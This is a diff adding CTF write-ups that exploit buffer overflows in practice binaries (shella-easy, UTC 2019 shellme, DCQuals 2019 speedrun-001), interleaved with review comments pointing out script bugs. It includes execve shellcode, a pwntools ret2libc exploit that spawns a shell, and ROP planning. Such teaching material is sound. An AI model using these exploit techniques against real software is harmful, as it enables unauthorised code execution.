+ ebx at 0xffffd0e4, ebp at 0xffffd0e8, eip at 0xffffd0ec
+
+
+
+Here we see that our 13371337 pattern is located at **0xffffd0a0** and the return address is located at **0xffffd0ec** so let's calculate the offset:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/2 ] [binexp/2/shella]
+ → python3
+ Python 3.9.2 (default, Feb 20 2021, 18:40:11)
+ [GCC 10.2.0] on linux
+ Type "help", "copyright", "credits" or "license" for more information.
+ >>> hex( 0xffffd0a0 - 0xffffd0ec )
+ '-0x4c'
+
+
+
+And we see that we have a 0x4c offset between our input text and the return function. With this we can create our exploit using the shellcode we used for the previous challenge:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/2 ] [binexp/2/shella]
+ → vim exploit.py
+
+
+
+
+ from pwn import *
+
+ target = process('./shella-easy')
+
+ leak = target.recvline()
+ leak = leak.strip(b"Yeah I'll have a ")
+ leak = leak.strip(b" with a side of fries thanks\n")
+
+ Adr = int(leak, 16)
+
+ payload = b""
+ # http://shell-storm.org/shellcode/files/shellcode-827.php
+ payload += b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
+ payload += b"\x00" * (0x40 - len(payload)) # Padding to the local_c variable
+ payload += p32(0xdeadbeef) #overwrite local_c with 0xdeadbeef
+ payload += b"\x00"*8 #padding to the return address
+ payload += p32(Adr) # Overwrite the return address to point to the start of our payload, where the shellcode is
+
+
+ #hexdump the payload:
+ print(hexdump(payload))
+
+
+
+Here we can see our payload (shellcode + nullbytes to get to 0x40 + little endian deadbeef + 8 nullbytes + little endian leaked address):
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/14 ] [binexp/2/shella]
+ → python3 exploit.py
+ [+] Starting local process './shella-easy': pid 1269456
+ 00000000 31 c0 50 68 2f 2f 73 68 68 2f 62 69 6e 89 e3 50 │1·Ph│//sh│h/bi│n··P│
+ 00000010 53 89 e1 b0 0b cd 80 00 00 00 00 00 00 00 00 00 │S···│····│····│····│
+ 00000020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │····│····│····│····│
+ *
+ 00000040 ef be ad de 00 00 00 00 00 00 00 00 10 0a 84 ff │····│····│····│····│
+ 00000050
+
+
+
+Now we send the payload to the binary file with the following 2 lines:
+
+
+ target.sendline(payload)
+ target.interactive()
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+![]()
+
+![]()
+
+![]()
+
+![]()
+
+![]()
+
+![]()
+
+![]()
+
+![]()
+
+![]()
+
+![]()
+
+![]()
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
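Review bot: `leak.strip(b"Yeah I'll have a ")` and `leak.strip(b" with a side of fries thanks\n")` treat their argument as a set of characters to trim from both ends, not as a substring; both sets contain the hex digits a, d, e and f, so whenever the leaked buffer address ends in one of those digits the trailing digit(s) are stripped and `Adr` points to the wrong place, which makes the exploit fail intermittently. Parse the line instead, e.g. `Adr = int(leak.split()[4], 16)`, or use `target.recvuntil(b"have a ")` followed by `target.recvuntil(b" with", drop=True)`. Two smaller points: the transcript shows `chmod +X shella-easy`, and `+X` only adds execute permission to directories or files that are already executable, so on a fresh download it does nothing and should read `chmod +x`; and the run of empty `![]()` tags plus the two `## Title` / `text` template sections at the end are leftovers that should be dropped.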
diff --git a/2/shme.md b/2/shme.md
new file mode 100644
index 0000000..cd5d0f8
--- /dev/null
+++ b/2/shme.md
@@ -0,0 +1,490 @@
+# Utc 2019 shellme
+
+## Downloading the binary file
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/25 ] [binexp/2/shme]
+ → wget -q https://github.com/guyinatuxedo/nightmare/raw/master/modules/08-bof_dynamic/utc19_shellme/libc6_2.27-3ubuntu1_i386.so
+
+ [ 192.168.0.18/24 ] [ /dev/pts/25 ] [binexp/2/shme]
+ → wget -q https://github.com/guyinatuxedo/nightmare/raw/master/modules/08-bof_dynamic/utc19_shellme/server
+
+ [ 192.168.0.18/24 ] [ /dev/pts/25 ] [binexp/2/shme]
+ → file server
+ server: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=be2f490cdd60374344e1075c9dd31060666bd524, not stripped
+
+ [ 192.168.0.18/24 ] [ /dev/pts/25 ] [binexp/2/shme]
+ → chmod +x server
+
+
+
+` ![]()
+
+## Solution
+
+First let's run pwn checksec on the binary file, and then execute it to see what it does:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/25 ] [binexp/2/shme]
+ → pwn checksec server; ./server
+ [*] '/home/nothing/binexp/2/shme/server'
+ Arch: i386-32-little
+ RELRO: Partial RELRO
+ Stack: No canary found
+ NX: NX enabled
+ PIE: No PIE (0x8048000)
+
+ Legend: buff MODIFIED padding MODIFIED
+ notsecret MODIFIED secret MODIFIED
+ return address MODIFIED
+ 0xffd2a2e0 | 00 00 00 00 00 00 00 00 |
+ 0xffd2a2e8 | 00 00 00 00 00 00 00 00 |
+ 0xffd2a2f0 | 00 00 00 00 00 00 00 00 |
+ 0xffd2a2f8 | 00 00 00 00 00 00 00 00 |
+ 0xffd2a300 | ff ff ff ff ff ff ff ff |
+ 0xffd2a308 | ff ff ff ff ff ff ff ff |
+ 0xffd2a310 | 40 d5 f0 f7 00 a0 04 08 |
+ 0xffd2a318 | 28 a3 d2 ff 8b 86 04 08 |
+ Return address: 0x0804868b
+
+ Input some text: here is some text
+
+ Legend: buff MODIFIED padding MODIFIED
+ notsecret MODIFIED secret MODIFIED
+ return address MODIFIED
+ 0xffd2a2e0 | 68 65 72 65 20 69 73 20 |
+ 0xffd2a2e8 | 73 6f 6d 65 20 74 65 78 |
+ 0xffd2a2f0 | 74 00 00 00 00 00 00 00 |
+ 0xffd2a2f8 | 00 00 00 00 00 00 00 00 |
+ 0xffd2a300 | ff ff ff ff ff ff ff ff |
+ 0xffd2a308 | ff ff ff ff ff ff ff ff |
+ 0xffd2a310 | 40 d5 f0 f7 00 a0 04 08 |
+ 0xffd2a318 | 28 a3 d2 ff 8b 86 04 08 |
+ Return address: 0x0804868b
+
+
+
+We see that we are dealing with a 32bit binary that has NX enabled, when we run the binary, and put in too much text we get the following:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/25 ] [binexp/2/shme]
+ → ./server
+
+ Legend: buff MODIFIED padding MODIFIED
+ notsecret MODIFIED secret MODIFIED
+ return address MODIFIED
+ 0xffd19e90 | 00 00 00 00 00 00 00 00 |
+ 0xffd19e98 | 00 00 00 00 00 00 00 00 |
+ 0xffd19ea0 | 00 00 00 00 00 00 00 00 |
+ 0xffd19ea8 | 00 00 00 00 00 00 00 00 |
+ 0xffd19eb0 | ff ff ff ff ff ff ff ff |
+ 0xffd19eb8 | ff ff ff ff ff ff ff ff |
+ 0xffd19ec0 | 40 75 ef f7 00 a0 04 08 |
+ 0xffd19ec8 | d8 9e d1 ff 8b 86 04 08 |
+ Return address: 0x0804868b
+
+ Input some text: 0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
+
+ Legend: buff MODIFIED padding MODIFIED
+ notsecret MODIFIED secret MODIFIED
+ return address MODIFIED
+ 0xffd19e90 | 30 30 30 30 30 30 30 30 |
+ 0xffd19e98 | 30 30 30 30 30 30 30 30 |
+ 0xffd19ea0 | 30 30 30 30 30 30 30 30 |
+ 0xffd19ea8 | 30 30 30 30 30 30 30 30 |
+ 0xffd19eb0 | 30 30 30 30 30 30 30 30 |
+ 0xffd19eb8 | 30 30 30 30 30 30 30 30 |
+ 0xffd19ec0 | 30 30 30 30 30 30 30 30 |
+ 0xffd19ec8 | 30 30 30 30 30 30 30 30 |
+ Return address: 0x30303030
+
+ [1] 1782143 segmentation fault (core dumped) ./server
+
+
+
+
+So here we see that we can cause a seg fault when we put in too much text, now let's take a look at it from inside ghidra:
+
+
+
+Luckily this time the main function is actually called 'main' so it was easy to find, we get the following code:
+
+
+ undefined4 main(void)
+
+ {
+ undefined *puVar1;
+
+ puVar1 = &stack0x00000004;
+ setbuf(stdout,(char *)0x0);
+ setbuf(stdin,(char *)0x0);
+ vuln(puVar1);
+ return 0;
+ }
+
+
+
+Here we see a function called 'vuln' so let's take a look at it:
+
+
+ void vuln(void)
+
+ {
+ char local_3c [32];
+ undefined local_1c [20];
+
+ memset(local_3c,0,0x20);
+ memset(local_1c,0xff,0x10);
+ init_visualize(local_3c);
+ visualize(local_3c);
+ printf("Input some text: ");
+ gets(local_3c);
+ visualize(local_3c);
+ return;
+ }
+
+
+Here we see that local_3c is initially set to be able to hold only 32 bytes of data, but then we see that it gets passed into a gets() call, and we know that gets calls are vulnerable to buffer overflows because it doesn't restrict our input at all. Plus since there is no stack canary, we can overwrite the return address and get code execution, so we let's set a breakpoint after the gets call, and see where our text input is stored in memory:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/25 ] [binexp/2/shme]
+ → gdb ./server
+ GNU gdb (GDB) 10.1
+ Copyright (C) 2020 Free Software Foundation, Inc.
+ License GPLv3+: GNU GPL version 3 or later
+ This is free software: you are free to change and redistribute it.
+ There is NO WARRANTY, to the extent permitted by law.
+ Type "show copying" and "show warranty" for details.
+ This GDB was configured as "x86_64-pc-linux-gnu".
+ Type "show configuration" for configuration details.
+ For bug reporting instructions, please see:
+ .
+ Find the GDB manual and other documentation resources online at:
+ .
+
+ For help, type "help".
+ Type "apropos word" to search for commands related to "word"...
+ GEF for linux ready, type `gef' to start, `gef config' to configure
+ 92 commands loaded for GDB 10.1 using Python engine 3.9
+ Reading symbols from ./server...
+ (No debugging symbols found in ./server)
+ gef➤ disas vulnm
+ No symbol table is loaded. Use the "file" command.
+ gef➤ disas vuln
+ Dump of assembler code for function vuln:
+ 0x080485b1 <+0>: push ebp
+ 0x080485b2 <+1>: mov ebp,esp
+ 0x080485b4 <+3>: push ebx
+ 0x080485b5 <+4>: sub esp,0x34
+ 0x080485b8 <+7>: call 0x80484c0 <__x86.get_pc_thunk.bx>
+ 0x080485bd <+12>: add ebx,0x1a43
+ 0x080485c3 <+18>: sub esp,0x4
+ 0x080485c6 <+21>: push 0x20
+ 0x080485c8 <+23>: push 0x0
+ 0x080485ca <+25>: lea eax,[ebp-0x38]
+ 0x080485cd <+28>: push eax
+ 0x080485ce <+29>: call 0x8048440
+ 0x080485d3 <+34>: add esp,0x10
+ 0x080485d6 <+37>: sub esp,0x4
+ 0x080485d9 <+40>: push 0x10
+ 0x080485db <+42>: push 0xff
+ 0x080485e0 <+47>: lea eax,[ebp-0x18]
+ 0x080485e3 <+50>: push eax
+ 0x080485e4 <+51>: call 0x8048440
+ 0x080485e9 <+56>: add esp,0x10
+ 0x080485ec <+59>: sub esp,0xc
+ 0x080485ef <+62>: lea eax,[ebp-0x38]
+ 0x080485f2 <+65>: push eax
+ 0x080485f3 <+66>: call 0x804869e
+ 0x080485f8 <+71>: add esp,0x10
+ 0x080485fb <+74>: sub esp,0xc
+ 0x080485fe <+77>: lea eax,[ebp-0x38]
+ 0x08048601 <+80>: push eax
+ 0x08048602 <+81>: call 0x80486e1
+ 0x08048607 <+86>: add esp,0x10
+ 0x0804860a <+89>: sub esp,0xc
+ 0x0804860d <+92>: lea eax,[ebx-0x16dd]
+ 0x08048613 <+98>: push eax
+ 0x08048614 <+99>: call 0x80483f0
+ 0x08048619 <+104>: add esp,0x10
+ 0x0804861c <+107>: sub esp,0xc
+ 0x0804861f <+110>: lea eax,[ebp-0x38]
+ 0x08048622 <+113>: push eax
+ 0x08048623 <+114>: call 0x8048400
+ 0x08048628 <+119>: add esp,0x10
+ 0x0804862b <+122>: sub esp,0xc
+ 0x0804862e <+125>: lea eax,[ebp-0x38]
+ 0x08048631 <+128>: push eax
+ 0x08048632 <+129>: call 0x80486e1
+ 0x08048637 <+134>: add esp,0x10
+ 0x0804863a <+137>: nop
+ 0x0804863b <+138>: mov ebx,DWORD PTR [ebp-0x4]
+ 0x0804863e <+141>: leave
+ 0x0804863f <+142>: ret
+ End of assembler dump.
+ gef➤ b *vuln+119
+ Breakpoint 1 at 0x8048628
+ gef➤ r
+ Starting program: /home/nothing/binexp/2/shme/server
+
+ Legend: buff MODIFIED padding MODIFIED
+ notsecret MODIFIED secret MODIFIED
+ return address MODIFIED
+ 0xffffd0a0 | 00 00 00 00 00 00 00 00 |
+ 0xffffd0a8 | 00 00 00 00 00 00 00 00 |
+ 0xffffd0b0 | 00 00 00 00 00 00 00 00 |
+ 0xffffd0b8 | 00 00 00 00 00 00 00 00 |
+ 0xffffd0c0 | ff ff ff ff ff ff ff ff |
+ 0xffffd0c8 | ff ff ff ff ff ff ff ff |
+ 0xffffd0d0 | 40 05 f9 f7 00 a0 04 08 |
+ 0xffffd0d8 | e8 d0 ff ff 8b 86 04 08 |
+ Return address: 0x0804868b
+
+ Input some text: 13371337
+
+ Breakpoint 1, 0x08048628 in vuln ()
+ [ Legend: Modified register | Code | Heap | Stack | String ]
+ ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
+ $eax : 0xffffd0a0 → "13371337"
+ $ebx : 0x0804a000 → 0x08049f0c → 0x00000001
+ $ecx : 0xf7f90540 → 0xfbad208b
+ $edx : 0xfbad208b
+ $esp : 0xffffd090 → 0xffffd0a0 → "13371337"
+ $ebp : 0xffffd0d8 → 0xffffd0e8 → 0x00000000
+ $esi : 0x1
+ $edi : 0x08048470 → <_start+0> xor ebp, ebp
+ $eip : 0x08048628 → add esp, 0x10
+ $eflags: [ZERO carry PARITY adjust sign trap INTERRUPT direction overflow resume virtualx86 identification]
+ $cs: 0x0023 $ss: 0x002b $ds: 0x002b $es: 0x002b $fs: 0x0000 $gs: 0x0063
+ ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
+ 0xffffd090│+0x0000: 0xffffd0a0 → "13371337" ← $esp
+ 0xffffd094│+0x0004: 0x000000ff
+ 0xffffd098│+0x0008: 0x00000010
+ 0xffffd09c│+0x000c: 0x080485bd → add ebx, 0x1a43
+ 0xffffd0a0│+0x0010: "13371337"
+ 0xffffd0a4│+0x0014: "1337"
+ 0xffffd0a8│+0x0018: 0x00000000
+ 0xffffd0ac│+0x001c: 0x00000000
+ ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:32 ────
+ 0x804861f lea eax, [ebp-0x38]
+ 0x8048622 push eax
+ 0x8048623 call 0x8048400
+ → 0x8048628 add esp, 0x10
+ 0x804862b sub esp, 0xc
+ 0x804862e lea eax, [ebp-0x38]
+ 0x8048631 push eax
+ 0x8048632 call 0x80486e1
+ 0x8048637 add esp, 0x10
+ ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
+ [#0] Id 1, Name: "server", stopped 0x8048628 in vuln (), reason: BREAKPOINT
+ ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
+ [#0] 0x8048628 → vuln()
+ [#1] 0x804868b → main()
+ ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
+ gef➤
+
+
+
+So what we did here was first disassemble the vuln function, set the breakpoint to be right after the gets call, and then run the binary, we gave it a simple pattern (13371337) and then we hit our breakpoint. So let's search for our pattern in memory, to determine the offset in between our input and the return address:
+
+
+ gef➤ search-pattern 13371337
+ [+] Searching '13371337' in memory
+ [+] In '[stack]'(0xfffdd000-0xffffe000), permission=rw-
+ 0xffffd0a0 - 0xffffd0a8 → "13371337"
+
+ gef➤ info frame
+ Stack level 0, frame at 0xffffd0e0:
+ eip = 0x8048628 in vuln; saved eip = 0x804868b
+ called by frame at 0xffffd100
+ Arglist at 0xffffd0d8, args:
+ Locals at 0xffffd0d8, Previous frame's sp is 0xffffd0e0
+ Saved registers:
+ ebx at 0xffffd0d4, ebp at 0xffffd0d8, eip at 0xffffd0dc
+
+
+
+Here we see that our input text is at **0xffffd0a0** and the return address is at **0xffffd0dc** So we can easily find the offset from a python3 shell:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/17 ] [Nextcloud/blog]
+ → python3
+ Python 3.9.2 (default, Feb 20 2021, 18:40:11)
+ [GCC 10.2.0] on linux
+ Type "help", "copyright", "credits" or "license" for more information.
+ >>> hex( 0xffffd0a0 - 0xffffd0dc )
+ '-0x3c'
+
+
+
+And here we see that we have a 0x3c bytes offset between our text input and the return address. The idea here is that we're going to call an instruction pointer, but what is it that we're going to call ? All we need is just 2 libc infoleaks, and it can become possible to identify the libc versions.
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/27 ] [binexp/2/shme]
+ → objdump -D server | grep puts
+ 08048410 <****puts@plt>:
+ 8048704: e8 07 fd ff ff call 8048410 <****puts@plt>
+ 8048716: e8 f5 fc ff ff call 8048410 <****puts@plt>
+ 8048846: e8 c5 fb ff ff call 8048410 <****puts@plt>
+ 8048881: e8 8a fb ff ff call 8048410 <****puts@plt>
+
+` ****
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/27 ] [binexp/2/shme]
+ → vim exploit.py
+
+
+
+We're going to make use of guyinatuxedo's ['TheNight']() Python library:
+
+
+ import TheNight
+ from pwn import *
+
+
+ libc = ELF("libc6_2.27-3ubuntu1_i386.so")
+ target = process("./server")
+ elf = ELF('server')
+
+
+ payload = ""
+ payload += "0"*0x3c
+ payload += p32(elf.symbols["puts"])
+ payload += p32(elf.symbols["vuln"])
+ payload += p32(elf.got["puts"])
+
+ target.sendline(payload)
+
+
+ for i in range(0, 2):
+ print target.recvuntil("Return address:")
+
+
+ for i in range(0, 2):
+ print target.recvline()
+
+
+ leak0 = target.recvline()[0:4]
+
+ puts = u32(leak0)
+
+ libcBase = puts - libc.symbols["puts"]
+
+ print "libc base: " + hex(libcBase)
+
+ binshOffset = 0x17e0cf
+
+ payload1 = ""
+ payload1 += "0"*0x3c
+ payload1 += p32(libcBase + libc.symbols["system"])
+ payload1 += p32(0x30303030)
+ payload1 += p32(libcBase + binshOffset)
+
+ target.sendline(payload1)
+
+ target.interactive()
+
+
+And when we run it:
+
+
+ [*] '/Hackery/utc/shelltime/libc6_2.27-3ubuntu1_i386.so'
+ Arch: i386-32-little
+ RELRO: Partial RELRO
+ Stack: Canary found
+ NX: NX enabled
+ PIE: PIE enabled
+ [*] '/Hackery/utc/shelltime/server'
+ Arch: i386-32-little
+ RELRO: Partial RELRO
+ Stack: No canary found
+ NX: NX enabled
+ PIE: No PIE (0x8048000)
+
+ Legend: buff MODIFIED padding MODIFIED
+ notsecret MODIFIED secret MODIFIED
+ return address MODIFIED
+ 0xffbba510 | 00 00 00 00 00 00 00 00 |
+ 0xffbba518 | 00 00 00 00 00 00 00 00 |
+ 0xffbba520 | 00 00 00 00 00 00 00 00 |
+ 0xffbba528 | 00 00 00 00 00 00 00 00 |
+ 0xffbba530 | ff ff ff ff ff ff ff ff |
+ 0xffbba538 | ff ff ff ff ff ff ff ff |
+ 0xffbba540 | c0 d5 ef f7 00 a0 04 08 |
+ 0xffbba548 | 58 a5 bb ff 8b 86 04 08 |
+ Return address:
+ 0x0804868b
+
+ Input some text:
+ Legend: buff MODIFIED padding MODIFIED
+ notsecret MODIFIED secret MODIFIED
+ return address MODIFIED
+ 0xffbba510 | 30 30 30 30 30 30 30 30 |
+ 0xffbba518 | 30 30 30 30 30 30 30 30 |
+ 0xffbba520 | 30 30 30 30 30 30 30 30 |
+ 0xffbba528 | 30 30 30 30 30 30 30 30 |
+ 0xffbba530 | 30 30 30 30 30 30 30 30 |
+ 0xffbba538 | 30 30 30 30 30 30 30 30 |
+ 0xffbba540 | 30 30 30 30 30 30 30 30 |
+ 0xffbba548 | 30 30 30 30 10 84 04 08 |
+ Return address:
+ 0x08048410
+
+
+
+ libc base: 0xf7d25000
+ [*] Switching to interactive mode
+
+ Legend: buff \x1b[32;1mMODIFIED padding MODIFIED
+ notsecret MODIFIED secret MODIFIED
+ return address MODIFIED
+ 0xffbba518 | 00 00 00 00 00 00 00 00 |
+ 0xffbba520 | 00 00 00 00 00 00 00 00 |
+ 0xffbba528 | 00 00 00 00 00 00 00 00 |
+ 0xffbba530 | 00 00 00 00 00 00 00 00 |
+ 0xffbba538 | ff ff ff ff ff ff ff ff |
+ 0xffbba540 | ff ff ff ff ff ff ff ff |
+ 0xffbba548 | 00 00 00 00 30 30 30 30 |
+ 0xffbba550 | 30 30 30 30 18 a0 04 08 |
+ Return address: 0x0804a018
+
+ Input some text:
+ Legend: buff MODIFIED padding MODIFIED
+ notsecret MODIFIED secret MODIFIED
+ return address MODIFIED
+ 0xffbba518 | 30 30 30 30 30 30 30 30 |
+ 0xffbba520 | 30 30 30 30 30 30 30 30 |
+ 0xffbba528 | 30 30 30 30 30 30 30 30 |
+ 0xffbba530 | 30 30 30 30 30 30 30 30 |
+ 0xffbba538 | 30 30 30 30 30 30 30 30 |
+ 0xffbba540 | 30 30 30 30 30 30 30 30 |
+ 0xffbba548 | 30 30 30 30 30 30 30 30 |
+ 0xffbba550 | 30 30 30 30 00 22 d6 f7 |
+ Return address: 0xf7d62200
+
+ $ cat flag.txt
+ utc{c0ntr0ling_r1p_1s_n0t_t00_h4rd}
+
+
+
+And we get the flag!
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
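Review bot: the exploit script in this hunk (`import TheNight` through `target.interactive()`) is Python 2 code (`print target.recvline()`, `payload = ""` followed by `payload += p32(...)`), while the offset a few lines earlier is computed in a `python3` shell; under Python 3 pwntools `"0"*0x3c + p32(...)` raises a TypeError because `p32` returns bytes, so either say the script needs Python 2 or port it (`payload = b"0"*0x3c`, `target.recvuntil(b"Return address:")`, `print(target.recvline())`). `import TheNight` is never used and the link `['TheNight']()` has an empty URL, so drop the import and the sentence or fill in the link. The prose claims "All we need is just 2 libc infoleaks, and it can become possible to identify the libc versions", but the script takes a single leak of `puts` against a libc that is already known (`libc6_2.27-3ubuntu1_i386.so`) and a hard-coded `binshOffset = 0x17e0cf` that is never derived; a sentence on where that libc came from, and `next(libc.search(b"/bin/sh\x00"))` in place of the magic number, would make the step reproducible. Also, `08048410 <****puts@plt>:` and the stray "` ****" line are leftover markdown bold markers from the objdump paste, and the two trailing "## Title / text / ` ![]()" sections are unfilled template placeholders that should not ship.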
diff --git a/2/speed.md b/2/speed.md
new file mode 100644
index 0000000..7833edb
--- /dev/null
+++ b/2/speed.md
@@ -0,0 +1,534 @@
+# DCQuals 2019 speed
+
+## Downloading the binary file
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/14 ] [binexp/2/speed]
+ → wget https://github.com/guyinatuxedo/nightmare/raw/master/modules/07-bof_static/dcquals19_speedrun1/speedrun-001
+ --2021-03-05 21:19:04-- https://github.com/guyinatuxedo/nightmare/raw/master/modules/07-bof_static/dcquals19_speedrun1/speedrun-001
+ Loaded CA certificate '/etc/ssl/certs/ca-certificates.crt'
+ Resolving github.com (github.com)... 140.82.121.4
+ Connecting to github.com (github.com)|140.82.121.4|:443... connected.
+ HTTP request sent, awaiting response... 302 Found
+ Location: https://raw.githubusercontent.com/guyinatuxedo/nightmare/master/modules/07-bof_static/dcquals19_speedrun1/speedrun-001 [following]
+ --2021-03-05 21:19:04-- https://raw.githubusercontent.com/guyinatuxedo/nightmare/master/modules/07-bof_static/dcquals19_speedrun1/speedrun-001
+ Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.111.133, 185.199.109.133, 185.199.108.133, ...
+ Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.111.133|:443... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 774392 (756K) [application/octet-stream]
+ Saving to: ‘speedrun-001’
+
+ speedrun-001 100%[=======================================================================================================================================================>] 756.24K 2.40MB/s in 0.3s
+
+ 2021-03-05 21:19:05 (2.40 MB/s) - ‘speedrun-001’ saved [774392/774392]
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/14 ] [binexp/2/speed]
+ → file speedrun-001
+ speedrun-001: ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, for GNU/Linux 3.2.0, BuildID[sha1]=e9266027a3231c31606a432ec4eb461073e1ffa9, stripped
+
+ [ 192.168.0.18/24 ] [ /dev/pts/14 ] [binexp/2/speed]
+ → chmod +x speedrun-001
+
+
+
+` ![]()
+
+## Solution
+
+first let's run pwn checksec onto the binary and execute it to see what it does:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/14 ] [binexp/2/speed]
+ → pwn checksec speedrun-001
+ [*] '/home/nothing/binexp/2/speed/speedrun-001'
+ Arch: amd64-64-little
+ RELRO: Partial RELRO
+ Stack: No canary found
+ NX: NX enabled
+ PIE: No PIE (0x400000)
+
+ [ 192.168.0.18/24 ] [ /dev/pts/14 ] [binexp/2/speed]
+ → ./speedrun-001
+ Hello brave new challenger
+ Any last words?
+ yes
+ This will be the last thing that you say: yes
+
+ Alas, you had no luck today.
+
+ [ 192.168.0.18/24 ] [ /dev/pts/14 ] [binexp/2/speed]
+ → ./speedrun-001
+ Hello brave new challenger
+ Any last words?
+ no
+ This will be the last thing that you say: no
+
+ Alas, you had no luck today.
+
+
+
+
+So here we have a 64bit statically compiled binary, the binary has NX which means Non Executable stack enabled, this means that the stack memory region is not executable, to get more info on this, we look at the binary from inside ghidra, however the main function isn't called 'main' as usual, this time we need to find where the output text is:
+
+[](http://ghidra.re/CheatSheet.html)
+
+We can use the CTRL+Shift+E to search for the program text line 'Any last words?' since it's safe to assume that it is in the main function
+
+
+
+Now we know the main function is **FUN_00400b60** and it has the following code:
+
+
+ void FUN_00400b60(void)
+
+ {
+ undefined local_408 [1024];
+
+ FUN_00410390("Any last words?");
+ FUN_004498a0(0,local_408,2000);
+ FUN_0040f710("This will be the last thing that you say: %s\n",local_408);
+ return;
+ }
+
+
+Here we see that our text gets put into the variable local_408 into a function called 'FUN_004498a0() which takes in 3 arguements, so let's investigate what this function really does:'
+
+
+ /* WARNING: Removing unreachable block (ram,0x00449910) */
+ /* WARNING: Removing unreachable block (ram,0x00449924) */
+
+ undefined8 FUN_004498a0(undefined8 param_1,undefined8 param_2,undefined8 param_3)
+
+ {
+ undefined4 uVar1;
+
+ if (DAT_006bc80c == 0) {
+ syscall();
+ return 0;
+ }
+ uVar1 = FUN_0044be40();
+ syscall();
+ FUN_0044bea0(uVar1,param_2,param_3);
+ return 0;
+ }
+
+
+
+So the function scans for our input (which is param_2) by making a syscall instead of using the usual fgets or scanf. Looking at the assembly code around the syscall we see the following:
+
+
+
+there is a xor call to set eax to 0 and thus the rax register is also set to 0, and we know that the rax register is important on the x86_64 architecture because this is what determines what our syscall ID is, you can check what those syscalls are [here](https://chromium.googlesource.com/chromiumos/docs/+/master/constants/syscalls.md#x86_64-64_bit):
+
+
+
+since rax is being set to 0 we are dealing with a read syscall, although we don't see the arguements being loaded for the syscall becasue they were already loaded when the function was called. Therefore the arguements this function takes, and the registers they take it in, are the same as the read syscall, so it can just call the read syscall after setting rax to zero (xoring eax with itself)
+
+
+ FUN_004498a0(0,local_408,2000);
+
+
+
+Looking back at the call to that function, we see that the third arguement is set to 2000, this means that the third arguement (param_3) gets passed into the syscall as an arguement, we can assume this is a limit to our text input variable (local_408) which can only hold 1024 bytes as it was initialized like so:
+
+
+ undefined local_408 [1024];
+
+
+
+Now here that we are scanning in 2000 bytes worth of input into our input value, which can only hold 1024 bytes, this means that there is an overflow that can potentially overflow and overwrite the return address to get code execution.
+
+The goal here is to create a ROP chain (Return Oriented Programming) and to use the buffer overflow to execute it. the ROP chain is made up of **ROP gadgets** , these are bits of code in the binary itself that end in a **ret** instruction
+
+We don't have to worry about the code being non-executable because this will be all valid code. Since PIE is disabled, we know the address of all of the binary file's instructions.
+
+Since the binary file is statically linked, that means it is a large binary with plenty of potential gadgets.
+
+The plan here is to make a ROP chain to make a execve() syscall to execute /bin/sh and to give us a shell. The required registers are the following:
+
+
+ rax: 59 #rax contains the syscall ID
+ rdi: ptr to "bin/sh" #rbx contains the first arguement (the file to execute)
+ rsi: 0 #rsi : 2nd arg
+ rdx: 0 #rdx : 3rd arg
+
+
+
+The ROP chain we will build will have 3 parts. First we write **/bin/sh** somewhere in memory, then move the pointer to it into the **rdi** register. Second, we move the necessary values into the other 3 registers. Third, we need to make the syscall itself.
+
+Now we need to find where in memory we can write **/bin/sh** To do so we check the memory mappings while the ELF is running to see what we have to work with. So let's first choose where we will put our breakpoint:
+
+
+
+
+ 00400ba1 b8 00 00 MOV EAX,0x0
+ 00 00
+ 00400ba6 e8 65 eb CALL FUN_0040f710 undefined FUN_0040f710(undefined
+ 00 00
+ 00400bab 90 NOP
+ 00400bac c9 LEAVE
+ 00400bad c3 RET
+
+
+
+So here we see that the last text output of the binary is at 0x400ba6 so we set our breakpoint right after at **0x400bab**
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/14 ] [binexp/2/speed]
+ → gdb ./speedrun-001
+ GNU gdb (GDB) 10.1
+ Copyright (C) 2020 Free Software Foundation, Inc.
+ License GPLv3+: GNU GPL version 3 or later
+ This is free software: you are free to change and redistribute it.
+ There is NO WARRANTY, to the extent permitted by law.
+ Type "show copying" and "show warranty" for details.
+ This GDB was configured as "x86_64-pc-linux-gnu".
+ Type "show configuration" for configuration details.
+ For bug reporting instructions, please see:
+ .
+ Find the GDB manual and other documentation resources online at:
+ .
+
+ For help, type "help".
+ Type "apropos word" to search for commands related to "word"...
+ GEF for linux ready, type `gef' to start, `gef config' to configure
